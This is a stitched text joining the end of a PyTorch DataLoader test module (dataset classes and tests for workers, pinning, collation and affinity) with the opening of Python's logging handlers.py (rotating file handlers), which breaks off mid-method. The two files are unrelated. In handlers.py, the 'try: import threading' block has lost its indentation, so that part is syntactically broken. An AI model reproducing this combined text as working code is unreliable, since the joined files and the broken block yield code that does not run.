        actual = list(local_datapipe)
        clean_me(process, req_queue, res_queue)

        self.assertEqual(list(range(100)), actual)

    @skipIfNoDill
    def test_basic_mapdatapipe_threading(self):
        def clean_me(process, req_queue, res_queue):
            # Same shutdown handshake as in test_basic_threading.
            req_queue.put(communication.messages.TerminateRequest())
            _ = res_queue.get()
            process.join()

        input_len = 100
        it = list(range(input_len))
        numbers_dp = SequenceWrapper(it)
        (process, req_queue, res_queue, _thread_local_datapipe) = communication.eventloop.SpawnThreadForDataPipeline(
            numbers_dp)

        process.start()

        # Functional Test: Ensure that you can retrieve every element from the Queue and DataPipe
        local_datapipe = communication.map.QueueWrapperForMap(
            communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
        actual = list(local_datapipe)
        self.assertEqual([(x, x) for x in range(100)], actual)

        # Functional Test: raise Error when input
        local_datapipe = communication.map.QueueWrapperForMap(
            communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
        with self.assertRaisesRegex(IndexError, "out of bound"):
            local_datapipe[1000]

        # __len__ Test: Ensure that the correct length is returned
        local_datapipe = communication.map.QueueWrapperForMap(
            communication.protocol.MapDataPipeQueueProtocolClient(req_queue, res_queue))
        self.assertEqual(input_len, len(local_datapipe))

        clean_me(process, req_queue, res_queue)
class StringDataset(Dataset):
    """Map-style dataset yielding (character, index) pairs from '12345'.

    Mixing a string with an int per sample lets tests check both the
    pass-through and the tensor collation paths at once.
    """

    def __init__(self):
        self.s = '12345'

    def __len__(self):
        return len(self.s)

    def __getitem__(self, ndx):
        # Pair each character with its position.
        return (self.s[ndx], ndx)
@unittest.skipIf(
    TEST_WITH_TSAN,
    "Fails with TSAN with the following error: starting new threads after multi-threaded "
    "fork is not supported. Dying (set die_after_fork=0 to override)")
class TestStringDataLoader(TestCase):
    """Loading (str, int) samples: strings survive collation as lists while
    the numeric half can still be pinned."""

    def setUp(self):
        super(TestStringDataLoader, self).setUp()
        self.dataset = StringDataset()

    @unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
    def test_shuffle_pin_memory(self):
        loader = DataLoader(self.dataset, batch_size=2, shuffle=True, num_workers=4, pin_memory=True)
        for (s, n) in loader:
            # Strings are collated into lists of str, not tensors.
            self.assertIsInstance(s[0], str)
            self.assertTrue(n.is_pinned())
class DictDataset(Dataset):
    """Four samples, each a nested dict of one tensor and one scalar index."""

    def __len__(self):
        return 4

    def __getitem__(self, ndx):
        # Fill the tensor with the index so batches are easy to verify.
        tensor = torch.empty(4, 2).fill_(ndx)
        return {
            'a_tensor': tensor,
            'another_dict': {'a_number': ndx},
        }
@unittest.skipIf(
    TEST_WITH_TSAN,
    "Fails with TSAN with the following error: starting new threads after multi-threaded "
    "fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDictDataLoader(TestCase):
    """Batching of dict-structured samples, including nested dicts."""

    def setUp(self):
        super(TestDictDataLoader, self).setUp()
        self.dataset = DictDataset()

    def test_sequential_batch(self):
        # Same checks with and without persistent workers.
        for persistent_workers in (False, True):
            if persistent_workers:
                loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
                                    persistent_workers=persistent_workers, num_workers=1)
            else:
                loader = DataLoader(self.dataset, batch_size=2, shuffle=False,
                                    persistent_workers=persistent_workers)
            batch_size = loader.batch_size
            for i, sample in enumerate(loader):
                idx = i * batch_size
                # Dict structure (including nesting) must be preserved.
                self.assertEqual(set(sample.keys()), {'a_tensor', 'another_dict'})
                self.assertEqual(set(sample['another_dict'].keys()), {'a_number'})

                t = sample['a_tensor']
                self.assertEqual(t.size(), torch.Size([batch_size, 4, 2]))
                self.assertTrue((t[0] == idx).all())
                self.assertTrue((t[1] == idx + 1).all())

                n = sample['another_dict']['a_number']
                self.assertEqual(n.size(), torch.Size([batch_size]))
                self.assertEqual(n[0], idx)
                self.assertEqual(n[1], idx + 1)

    @unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
    def test_pin_memory(self):
        # pin_memory must recurse into nested dict values.
        loader = DataLoader(self.dataset, batch_size=2, pin_memory=True)
        for sample in loader:
            self.assertTrue(sample['a_tensor'].is_pinned())
            self.assertTrue(sample['another_dict']['a_number'].is_pinned())
class DummyDataset(torch.utils.data.Dataset):
    """Dataset of 0..9 that asserts its `start` attribute is still 0.

    Persistent workers hold their own copy of the dataset for the
    dataloader's lifetime, so attribute changes made in the parent after
    the workers spawn must not be visible inside `__getitem__`.
    """

    def __init__(self):
        self.data = list(range(10))

    def __len__(self):
        return len(self.data)

    def __getitem__(self, idx):
        if torch.is_tensor(idx):
            idx = idx.tolist()
        # The persistent workers always maintain the original
        # dataset through the dataloader lifetime
        # so the attributes will remain the same as the
        # first time the workers where spawned (dataloader iteration)
        assert self.start == 0
        return self.data[idx]
@unittest.skipIf(
    TEST_WITH_TSAN,
    "Fails with TSAN with the following error: starting new threads after multi-threaded "
    "fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
    TEST_WITH_ASAN, "DataLoader tests hang in ASAN, see: https://github.com/pytorch/pytorch/issues/66223")
class TestDataLoaderPersistentWorkers(TestDataLoader):
    """Re-runs the whole TestDataLoader suite with persistent_workers=True,
    plus a few persistent-worker-specific regression tests."""

    def setUp(self):
        super(TestDataLoaderPersistentWorkers, self).setUp()
        # Flag consumed by the inherited tests via self.persistent_workers.
        self.persistent_workers = True

    @unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
    @unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
    def test_fd_limit_exceeded(self):
        # See NOTE [ DataLoader on Linux and open files limit ]
        # Runs in a subprocess so the lowered RLIMIT_NOFILE cannot affect
        # the rest of the test session; expects the loader to surface a
        # helpful RuntimeError mentioning the workarounds.
        import subprocess
        subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
    def __init__(self, len, size):
        super(RandomDataset).__init__()
        self.len = len
        self.size = size
    def __iter__(self):
        return self
    def __next__(self):
        if self.len <= 0:
            raise StopIteration
        self.len -= 1
        return torch.randn(self.size)
try:
    keep_fds_alive = []
    resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
    for random_t in DataLoader(RandomDataset(200, (2,2)), multiprocessing_context="fork",
                               num_workers=1, persistent_workers=True):
        random_t.max(dim=0)
        keep_fds_alive.append(random_t)
except RuntimeError as e:
    assert "ulimit -n" in str(e)
    assert "set_sharing_strategy" in str(e)
"""])

    def test_dataset_not_reset(self):
        dataset = DummyDataset()
        pin_memory_configs = [False]
        if TEST_CUDA:
            pin_memory_configs.append(True)
        for pin_memory in pin_memory_configs:
            dataloader = self._get_data_loader(dataset, num_workers=2, pin_memory=pin_memory)
            dataset.start = 0
            for i in range(10):
                for x in dataloader:
                    pass
                # Changing the start value here doesn't have any effect in the dataset
                # cached by the workers. since they are not recreated between epochs
                # and can cache values safely
                dataset.start = i
class NamedTupleDataset(Dataset):
    """Dataset whose samples are nested namedtuples (plus a random tensor)."""
    from collections import namedtuple
    # Batch wraps a Data pair, a string label, and a throwaway tensor.
    Batch = namedtuple('Batch', ['data', 'label', 'random_tensor'])
    Data = namedtuple('Data', ['positive', 'negative'])

    def __len__(self):
        return 4

    def __getitem__(self, ndx):
        pair = self.Data(positive=ndx, negative=-ndx)
        return self.Batch(data=pair, label=str(ndx), random_tensor=torch.randn(3))
@unittest.skipIf(
    TEST_WITH_TSAN,
    "Fails with TSAN with the following error: starting new threads after multi-threaded "
    "fork is not supported. Dying (set die_after_fork=0 to override)")
class TestNamedTupleDataLoader(TestCase):
    """Collation must preserve (nested) namedtuple structure."""

    def setUp(self):
        super(TestNamedTupleDataLoader, self).setUp()
        self.dataset = NamedTupleDataset()

    def test_dataloader_with_namedtuple(self):
        # auto-collation
        loader = DataLoader(self.dataset, batch_size=2, pin_memory=TEST_CUDA)
        for batch in loader:
            self.assertIsInstance(batch, NamedTupleDataset.Batch)
            self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
            self.assertIsInstance(batch.data, NamedTupleDataset.Data)
            # Collation converts the raw ints into a tensor.
            self.assertIsInstance(batch.data.positive, torch.Tensor)
            self.assertEqual(batch.data.positive.is_pinned(), TEST_CUDA)
        # no auto-collation
        loader = DataLoader(self.dataset, batch_size=None, pin_memory=TEST_CUDA)
        for batch in loader:
            self.assertIsInstance(batch, NamedTupleDataset.Batch)
            self.assertEqual(batch.random_tensor.is_pinned(), TEST_CUDA)
            self.assertIsInstance(batch.data, NamedTupleDataset.Data)
            # Without collation the raw int from the dataset is untouched.
            self.assertNotIsInstance(batch.data.positive, torch.Tensor)
class SimpleCustomBatch(object):
    """Custom batch holding stacked inputs/targets, with pin_memory support.

    DataLoader's pin_memory=True path calls `pin_memory()` on any batch
    object that defines it, which is what the tests using this class check.
    """

    def __init__(self, data):
        # data is a list of (input, target) samples; transpose into one
        # tuple of inputs and one of targets, then stack each.
        transposed = list(zip(*data))
        self.inp = torch.stack(transposed[0], 0)
        self.tgt = torch.stack(transposed[1], 0)

    def pin_memory(self):
        # Pin both tensors and return self, as DataLoader expects.
        self.inp = self.inp.pin_memory()
        self.tgt = self.tgt.pin_memory()
        return self

    def is_pinned(self):
        return self.inp.is_pinned() and self.tgt.is_pinned()
# Workaround for https://github.com/pytorch/pytorch/issues/50661
# Classes from `__main__` can not be correctly unpickled from spawned module
# See https://docs.python.org/3/library/multiprocessing.html#multiprocessing-programming
# Re-import this very file under its real module name so that classes and
# functions referenced through `self_module` stay picklable in spawned workers.
self_module = __import__(os.path.splitext(os.path.basename(__file__))[0])
def collate_wrapper(batch):
    # Picklable module-level collate_fn that wraps samples in
    # SimpleCustomBatch, resolved through `self_module` so spawned worker
    # processes can unpickle it.
    return self_module.SimpleCustomBatch(batch)
def collate_into_packed_sequence(batch):
    """Collate samples into a time-major PackedSequence with random lengths."""
    # Stack inputs along dim 1 -> shape (seq_len, batch).
    data = torch.stack([sample[0] for sample in batch], 1)
    seq_len, batch_size = data.size()
    # One random valid length per sequence: at least 1, strictly < seq_len.
    lengths = torch.randint(1, seq_len, size=(batch_size,), dtype=torch.int64)
    return torch.nn.utils.rnn.pack_padded_sequence(data, lengths, enforce_sorted=False)
def collate_into_packed_sequence_batch_first(batch):
    """Collate samples into a batch-first PackedSequence with random lengths."""
    # Stack inputs along dim 0 -> shape (batch, seq_len).
    data = torch.stack([sample[0] for sample in batch], 0)
    batch_size, seq_len = data.size()
    # One random valid length per sequence: at least 1, strictly < seq_len.
    lengths = torch.randint(1, seq_len, size=(batch_size,), dtype=torch.int64)
    return torch.nn.utils.rnn.pack_padded_sequence(
        data, lengths, batch_first=True, enforce_sorted=False)
@unittest.skipIf(
    TEST_WITH_TSAN,
    "Fails with TSAN with the following error: starting new threads after multi-threaded "
    "fork is not supported. Dying (set die_after_fork=0 to override)")
class TestCustomPinFn(TestCase):
    """pin_memory=True must invoke a custom batch type's own pin_memory()."""

    def setUp(self):
        super(TestCustomPinFn, self).setUp()
        inps = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
        tgts = torch.arange(10 * 5, dtype=torch.float32).view(10, 5)
        self.dataset = TensorDataset(inps, tgts)

    @unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
    def test_custom_batch_pin(self):
        # Each collate_fn yields a custom batch type; pinning must preserve
        # the type and pin its contents.
        test_cases = [
            (collate_wrapper, self_module.SimpleCustomBatch),
            (collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
            (collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
        ]
        for collate_fn, elem_cls in test_cases:
            loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
                                pin_memory=True)
            for sample in loader:
                self.assertIsInstance(sample, elem_cls)
                self.assertTrue(sample.is_pinned())

    @unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
    def test_custom_batch_pin_worker(self):
        # Same as above, but the batches are produced by a worker process.
        test_cases = [
            (collate_wrapper, self_module.SimpleCustomBatch),
            (collate_into_packed_sequence, torch.nn.utils.rnn.PackedSequence),
            (collate_into_packed_sequence_batch_first, torch.nn.utils.rnn.PackedSequence),
        ]
        for collate_fn, elem_cls in test_cases:
            loader = DataLoader(self.dataset, batch_size=2, collate_fn=collate_fn,
                                pin_memory=True, num_workers=1)
            for sample in loader:
                self.assertIsInstance(sample, elem_cls)
                self.assertTrue(sample.is_pinned())
class TestWorkerQueueDataset(Dataset):
    """Map-style dataset that tags every item with the id of the worker serving it.

    `worker_init_fn` is meant to be passed to DataLoader so each worker's copy
    of the dataset records its own worker id.
    """

    def __init__(self, data):
        self.data = data
        # Stays None on the main process; set inside each worker by
        # worker_init_fn.
        self.worker_id = None

    def worker_init_fn(self, worker_id):
        self.worker_id = worker_id

    def __getitem__(self, item):
        return (self.worker_id, self.data[item])

    def __len__(self):
        return len(self.data)
@unittest.skipIf(
    TEST_WITH_TSAN,
    "Fails with TSAN with the following error: starting new threads after multi-threaded "
    "fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
    TEST_WITH_ASAN,
    "Flaky with ASAN, see https://github.com/pytorch/pytorch/issues/65727")
class TestIndividualWorkerQueue(TestCase):
    # Verifies that the DataLoader hands batches to workers strictly
    # round-robin (each worker has its own index queue), and that results
    # come back in order when shuffle=False.

    def setUp(self):
        super(TestIndividualWorkerQueue, self).setUp()
        self.dataset = TestWorkerQueueDataset(list(range(128)))

    def _run_ind_worker_queue_test(self, batch_size, num_workers):
        # worker_init_fn stamps the worker id into each worker's dataset copy,
        # so every returned sample reports which worker produced it.
        loader = DataLoader(
            self.dataset, batch_size=batch_size, shuffle=False, num_workers=num_workers,
            timeout=5, worker_init_fn=self.dataset.worker_init_fn
        )
        current_worker_idx = 0
        for i, (worker_ids, sample) in enumerate(loader):
            # Batch i must come entirely from worker i % num_workers, and the
            # data must arrive in dataset order.
            self.assertEqual(worker_ids.tolist(), [current_worker_idx] * batch_size)
            self.assertEqual(sample.tolist(), list(range(i * batch_size, (i + 1) * batch_size)))
            current_worker_idx += 1
            if current_worker_idx == num_workers:
                current_worker_idx = 0

    def test_ind_worker_queue(self):
        # Cap worker count by available CPUs: prefer the affinity mask when
        # the platform exposes it (Linux), else half of os.cpu_count(),
        # else fall back to a single worker.
        max_num_workers = None
        if hasattr(os, 'sched_getaffinity'):
            try:
                max_num_workers = len(os.sched_getaffinity(0))
            except Exception:
                pass
        if max_num_workers is None:
            cpu_count = os.cpu_count()
            if cpu_count is not None:
                # Use half number of CPUs
                max_num_workers = cpu_count // 2
        if max_num_workers is None:
            max_num_workers = 1
        for batch_size in (8, 16, 32, 64):
            for num_workers in range(0, min(6, max_num_workers)):
                self._run_ind_worker_queue_test(batch_size=batch_size, num_workers=num_workers + 1)
class SetAffinityDataset(IterableDataset):
    """Iterable dataset yielding the CPU ids in the current process's affinity mask.

    Linux-only: relies on os.sched_getaffinity.
    """

    def __iter__(self):
        # NOTE(review): the randperm call exercises torch's RNG before the
        # affinity is read — ordering inherited from the original; intent is
        # presumably to touch torch inside the worker first.
        torch.randperm(1)
        return iter(os.sched_getaffinity(0))
def worker_set_affinity(_):
    # worker_init_fn: pin the calling worker process to the last CPU, so a
    # test can observe the changed affinity through SetAffinityDataset.
    # Linux-only (os.sched_setaffinity); the worker_id argument is unused.
    os.sched_setaffinity(0, [multiprocessing.cpu_count() - 1])
@unittest.skipIf(
    not hasattr(os, 'sched_setaffinity'),
    "os.sched_setaffinity is not available")
class TestSetAffinity(TestCase):
    # Checks that a worker_init_fn may change the worker's CPU affinity and
    # that the dataset iterated inside the worker observes the new mask.
    def test_set_affinity_in_worker_init(self):
        dataset = SetAffinityDataset()
        dataloader = torch.utils.data.DataLoader(
            dataset, num_workers=2, worker_init_fn=worker_set_affinity)
        for sample in dataloader:
            # Each worker was pinned to the last CPU, so every yielded
            # affinity entry must be exactly that CPU id.
            self.assertEqual(sample, [multiprocessing.cpu_count() - 1])
class ConvDataset(Dataset):
    """Single-item dataset whose __getitem__ runs a conv1d.

    Construction deliberately performs one convolution in the parent process
    (before any worker forks), which is the setup the fork-safety regression
    test requires.
    """

    def __init__(self):
        self.x = torch.ones(1, 1, 24000)
        # Call convolution on parent process
        self[0]

    def __len__(self):
        return 1

    def __getitem__(self, index):
        kernel = torch.ones(1, 1, 2)
        return torch.nn.functional.conv1d(self.x, kernel)
@unittest.skipIf(IS_WINDOWS, "Needs fork")
class TestConvAfterFork(TestCase):
    # Tests crash reported in https://github.com/pytorch/pytorch/issues/53565
    def test_conv_after_fork(self):
        # ConvDataset runs a conv1d in the parent before the worker forks;
        # the worker then runs the same conv, which used to crash.
        loader = DataLoader(ConvDataset(), num_workers=1)
        for x in loader:
            # Batched result: leading batch dim + conv1d output (1, 1, 23999).
            self.assertEqual(x.shape, (1, 1, 1, 23999))
if __name__ == '__main__':
    # Entry point: delegate to the shared PyTorch test runner.
    run_tests()
|
handlers.py | # Copyright 2001-2016 by Vinay Sajip. All Rights Reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose and without fee is hereby granted,
# provided that the above copyright notice appear in all copies and that
# both that copyright notice and this permission notice appear in
# supporting documentation, and that the name of Vinay Sajip
# not be used in advertising or publicity pertaining to distribution
# of the software without specific, written prior permission.
# VINAY SAJIP DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE, INCLUDING
# ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL
# VINAY SAJIP BE LIABLE FOR ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR
# ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER
# IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
Additional handlers for the logging package for Python. The core package is
based on PEP 282 and comments thereto in comp.lang.python.
Copyright (C) 2001-2016 Vinay Sajip. All Rights Reserved.
To use, simply 'import logging.handlers' and log away!
"""
import logging, socket, os, pickle, struct, time, re
from stat import ST_DEV, ST_INO, ST_MTIME
import queue
try:
import threading
except ImportError: #pragma: no cover
threading = None
#
# Some constants...
#
# Default ports for the socket-based handlers below; a receiver is expected
# to listen on the matching port.
DEFAULT_TCP_LOGGING_PORT = 9020
DEFAULT_UDP_LOGGING_PORT = 9021
DEFAULT_HTTP_LOGGING_PORT = 9022
DEFAULT_SOAP_LOGGING_PORT = 9023
# Standard syslog port (both transports).
SYSLOG_UDP_PORT = 514
SYSLOG_TCP_PORT = 514

_MIDNIGHT = 24 * 60 * 60  # number of seconds in a day
class BaseRotatingHandler(logging.FileHandler):
    """Base class for handlers that rotate log files at a certain point.

    Not meant to be instantiated directly; use RotatingFileHandler or
    TimedRotatingFileHandler instead.
    """

    def __init__(self, filename, mode, encoding=None, delay=False):
        """Use the specified filename for streamed logging."""
        logging.FileHandler.__init__(self, filename, mode, encoding, delay)
        self.mode = mode
        self.encoding = encoding
        # Optional user-supplied callables customizing rotation; see
        # rotation_filename() and rotate() below.
        self.namer = None
        self.rotator = None

    def emit(self, record):
        """Emit a record.

        Output the record to the file, rolling over first when
        shouldRollover() says so.
        """
        try:
            if self.shouldRollover(record):
                self.doRollover()
            logging.FileHandler.emit(self, record)
        except Exception:
            self.handleError(record)

    def rotation_filename(self, default_name):
        """Return the filename to use when rotating.

        Delegates to the 'namer' attribute when it is callable; otherwise
        (the default is None) the name is returned unchanged.

        :param default_name: The default name for the log file.
        """
        if callable(self.namer):
            return self.namer(default_name)
        return default_name

    def rotate(self, source, dest):
        """Rotate the current log from *source* to *dest*.

        Delegates to the 'rotator' attribute when it is callable; otherwise
        (the default is None) the source is simply renamed to the
        destination.

        :param source: The source filename, normally the base filename,
                       e.g. 'test.log'.
        :param dest: The destination filename, normally what the source is
                     rotated to, e.g. 'test.log.1'.
        """
        if callable(self.rotator):
            self.rotator(source, dest)
        elif os.path.exists(source):
            # Issue 18940: the file may not have been created if delay is
            # True, so only rename when it actually exists.
            os.rename(source, dest)
class RotatingFileHandler(BaseRotatingHandler):
    """
    Handler for logging to a set of files, which switches from one file
    to the next when the current file reaches a certain size.
    """

    def __init__(self, filename, mode='a', maxBytes=0, backupCount=0, encoding=None, delay=False):
        """
        Open the specified file and use it as the stream for logging.

        By default, the file grows indefinitely. You can specify particular
        values of maxBytes and backupCount to allow the file to rollover at
        a predetermined size.

        Rollover occurs whenever the current log file is nearly maxBytes in
        length. If backupCount is >= 1, the system will successively create
        new files with the same pathname as the base file, but with extensions
        ".1", ".2" etc. appended to it. For example, with a backupCount of 5
        and a base file name of "app.log", you would get "app.log",
        "app.log.1", "app.log.2", ... through to "app.log.5". The file being
        written to is always "app.log" - when it gets filled up, it is closed
        and renamed to "app.log.1", and if files "app.log.1", "app.log.2" etc.
        exist, then they are renamed to "app.log.2", "app.log.3" etc.
        respectively.

        If maxBytes is zero, rollover never occurs.
        """
        # If rotation/rollover is wanted, it doesn't make sense to use another
        # mode. If for example 'w' were specified, then if there were multiple
        # runs of the calling application, the logs from previous runs would be
        # lost if the 'w' is respected, because the log file would be truncated
        # on each run.
        if maxBytes > 0:
            mode = 'a'
        BaseRotatingHandler.__init__(self, filename, mode, encoding, delay)
        self.maxBytes = maxBytes
        self.backupCount = backupCount

    def doRollover(self):
        """
        Do a rollover, as described in __init__().
        """
        if self.stream:
            self.stream.close()
            self.stream = None
        if self.backupCount > 0:
            # Shift app.log.1 -> app.log.2 etc., highest index first so the
            # oldest backup (.backupCount) is overwritten/dropped.
            for i in range(self.backupCount - 1, 0, -1):
                sfn = self.rotation_filename("%s.%d" % (self.baseFilename, i))
                dfn = self.rotation_filename("%s.%d" % (self.baseFilename,
                                                        i + 1))
                if os.path.exists(sfn):
                    if os.path.exists(dfn):
                        os.remove(dfn)
                    os.rename(sfn, dfn)
            dfn = self.rotation_filename(self.baseFilename + ".1")
            if os.path.exists(dfn):
                os.remove(dfn)
            self.rotate(self.baseFilename, dfn)
        if not self.delay:
            self.stream = self._open()

    def shouldRollover(self, record):
        """
        Determine if rollover should occur.

        Basically, see if the supplied record would cause the file to exceed
        the size limit we have.
        """
        if self.stream is None:                 # delay was set...
            self.stream = self._open()
        if self.maxBytes > 0:                   # are we rolling over?
            # NOTE: length check is on the formatted str, not its encoded
            # bytes, so maxBytes is approximate for multi-byte encodings.
            msg = "%s\n" % self.format(record)
            self.stream.seek(0, 2)  # due to non-posix-compliant Windows feature
            if self.stream.tell() + len(msg) >= self.maxBytes:
                return 1
        return 0
class TimedRotatingFileHandler(BaseRotatingHandler):
    """
    Handler for logging to a file, rotating the log file at certain timed
    intervals.

    If backupCount is > 0, when rollover is done, no more than backupCount
    files are kept - the oldest ones are deleted.
    """

    def __init__(self, filename, when='h', interval=1, backupCount=0, encoding=None, delay=False, utc=False, atTime=None):
        """
        Open the specified file and rotate it at timed intervals.

        :param when: unit of the rollover interval ('S', 'M', 'H', 'D',
                     'midnight' or 'W0'-'W6'); case-insensitive.
        :param interval: number of `when` units between rollovers.
        :param backupCount: if > 0, keep at most this many rotated files.
        :param utc: use UTC rather than local time for rollover computation.
        :param atTime: a datetime.time giving the time of day to rotate at,
                       for midnight/weekly rollover only.
        """
        BaseRotatingHandler.__init__(self, filename, 'a', encoding, delay)
        self.when = when.upper()
        self.backupCount = backupCount
        self.utc = utc
        self.atTime = atTime
        # Calculate the real rollover interval, which is just the number of
        # seconds between rollovers. Also set the filename suffix used when
        # a rollover occurs. Current 'when' events supported:
        # S - Seconds
        # M - Minutes
        # H - Hours
        # D - Days
        # midnight - roll over at midnight
        # W{0-6} - roll over on a certain day; 0 - Monday
        #
        # Case of the 'when' specifier is not important; lower or upper case
        # will work.
        if self.when == 'S':
            self.interval = 1  # one second
            self.suffix = "%Y-%m-%d_%H-%M-%S"
            self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}-\d{2}(\.\w+)?$"
        elif self.when == 'M':
            self.interval = 60  # one minute
            self.suffix = "%Y-%m-%d_%H-%M"
            self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}-\d{2}(\.\w+)?$"
        elif self.when == 'H':
            self.interval = 60 * 60  # one hour
            self.suffix = "%Y-%m-%d_%H"
            self.extMatch = r"^\d{4}-\d{2}-\d{2}_\d{2}(\.\w+)?$"
        elif self.when == 'D' or self.when == 'MIDNIGHT':
            self.interval = 60 * 60 * 24  # one day
            self.suffix = "%Y-%m-%d"
            self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
        elif self.when.startswith('W'):
            self.interval = 60 * 60 * 24 * 7  # one week
            if len(self.when) != 2:
                raise ValueError("You must specify a day for weekly rollover from 0 to 6 (0 is Monday): %s" % self.when)
            if self.when[1] < '0' or self.when[1] > '6':
                raise ValueError("Invalid day specified for weekly rollover: %s" % self.when)
            self.dayOfWeek = int(self.when[1])
            self.suffix = "%Y-%m-%d"
            self.extMatch = r"^\d{4}-\d{2}-\d{2}(\.\w+)?$"
        else:
            raise ValueError("Invalid rollover interval specified: %s" % self.when)

        self.extMatch = re.compile(self.extMatch, re.ASCII)
        self.interval = self.interval * interval  # multiply by units requested
        # Base the first rollover on the existing file's mtime when present,
        # so restarts don't reset the rotation clock.
        if os.path.exists(filename):
            t = os.stat(filename)[ST_MTIME]
        else:
            t = int(time.time())
        self.rolloverAt = self.computeRollover(t)

    def computeRollover(self, currentTime):
        """
        Work out the rollover time based on the specified time.
        """
        result = currentTime + self.interval
        # If we are rolling over at midnight or weekly, then the interval is already known.
        # What we need to figure out is WHEN the next interval is. In other words,
        # if you are rolling over at midnight, then your base interval is 1 day,
        # but you want to start that one day clock at midnight, not now. So, we
        # have to fudge the rolloverAt value in order to trigger the first rollover
        # at the right time. After that, the regular interval will take care of
        # the rest. Note that this code doesn't care about leap seconds. :)
        if self.when == 'MIDNIGHT' or self.when.startswith('W'):
            # This could be done with less code, but I wanted it to be clear
            if self.utc:
                t = time.gmtime(currentTime)
            else:
                t = time.localtime(currentTime)
            currentHour = t[3]
            currentMinute = t[4]
            currentSecond = t[5]
            currentDay = t[6]
            # r is the number of seconds left between now and the next rotation
            if self.atTime is None:
                rotate_ts = _MIDNIGHT
            else:
                rotate_ts = ((self.atTime.hour * 60 + self.atTime.minute)*60 +
                    self.atTime.second)

            r = rotate_ts - ((currentHour * 60 + currentMinute) * 60 +
                currentSecond)
            if r < 0:
                # Rotate time is before the current time (for example when
                # self.rotateAt is 13:45 and it now 14:15), rotation is
                # tomorrow.
                r += _MIDNIGHT
                currentDay = (currentDay + 1) % 7
            result = currentTime + r
            # If we are rolling over on a certain day, add in the number of days until
            # the next rollover, but offset by 1 since we just calculated the time
            # until the next day starts.  There are three cases:
            # Case 1) The day to rollover is today; in this case, do nothing
            # Case 2) The day to rollover is further in the interval (i.e., today is
            #         day 2 (Wednesday) and rollover is on day 6 (Sunday).  Days to
            #         next rollover is simply 6 - 2 - 1, or 3.
            # Case 3) The day to rollover is behind us in the interval (i.e., today
            #         is day 5 (Saturday) and rollover is on day 3 (Thursday).
            #         Days to rollover is 6 - 5 + 3, or 4.  In this case, it's the
            #         number of days left in the current week (1) plus the number
            #         of days in the next week until the rollover day (3).
            # The calculations described in 2) and 3) above need to have a day added.
            # This is because the above time calculation takes us to midnight on this
            # day, i.e. the start of the next day.
            if self.when.startswith('W'):
                day = currentDay  # 0 is Monday
                if day != self.dayOfWeek:
                    if day < self.dayOfWeek:
                        daysToWait = self.dayOfWeek - day
                    else:
                        daysToWait = 6 - day + self.dayOfWeek + 1
                    newRolloverAt = result + (daysToWait * (60 * 60 * 24))
                    if not self.utc:
                        # Adjust for a DST transition between now and the
                        # computed rollover (local time only).
                        dstNow = t[-1]
                        dstAtRollover = time.localtime(newRolloverAt)[-1]
                        if dstNow != dstAtRollover:
                            if not dstNow:  # DST kicks in before next rollover, so we need to deduct an hour
                                addend = -3600
                            else:           # DST bows out before next rollover, so we need to add an hour
                                addend = 3600
                            newRolloverAt += addend
                    result = newRolloverAt
        return result

    def shouldRollover(self, record):
        """
        Determine if rollover should occur.

        record is not used, as we are just comparing times, but it is needed so
        the method signatures are the same
        """
        t = int(time.time())
        if t >= self.rolloverAt:
            return 1
        return 0

    def getFilesToDelete(self):
        """
        Determine the files to delete when rolling over.

        More specific than the earlier method, which just used glob.glob().
        """
        dirName, baseName = os.path.split(self.baseFilename)
        fileNames = os.listdir(dirName)
        result = []
        prefix = baseName + "."
        plen = len(prefix)
        for fileName in fileNames:
            if fileName[:plen] == prefix:
                suffix = fileName[plen:]
                # Only files whose suffix matches this handler's timestamp
                # pattern count as our rotated backups.
                if self.extMatch.match(suffix):
                    result.append(os.path.join(dirName, fileName))
        result.sort()
        if len(result) < self.backupCount:
            result = []
        else:
            # Keep the newest backupCount files; delete the rest.
            result = result[:len(result) - self.backupCount]
        return result

    def doRollover(self):
        """
        do a rollover; in this case, a date/time stamp is appended to the filename
        when the rollover happens.  However, you want the file to be named for the
        start of the interval, not the current time.  If there is a backup count,
        then we have to get a list of matching filenames, sort them and remove
        the one with the oldest suffix.
        """
        if self.stream:
            self.stream.close()
            self.stream = None
        # get the time that this sequence started at and make it a TimeTuple
        currentTime = int(time.time())
        dstNow = time.localtime(currentTime)[-1]
        t = self.rolloverAt - self.interval
        if self.utc:
            timeTuple = time.gmtime(t)
        else:
            timeTuple = time.localtime(t)
            dstThen = timeTuple[-1]
            if dstNow != dstThen:
                # DST changed during the interval: shift so the suffix names
                # the interval start in the then-current local time.
                if dstNow:
                    addend = 3600
                else:
                    addend = -3600
                timeTuple = time.localtime(t + addend)
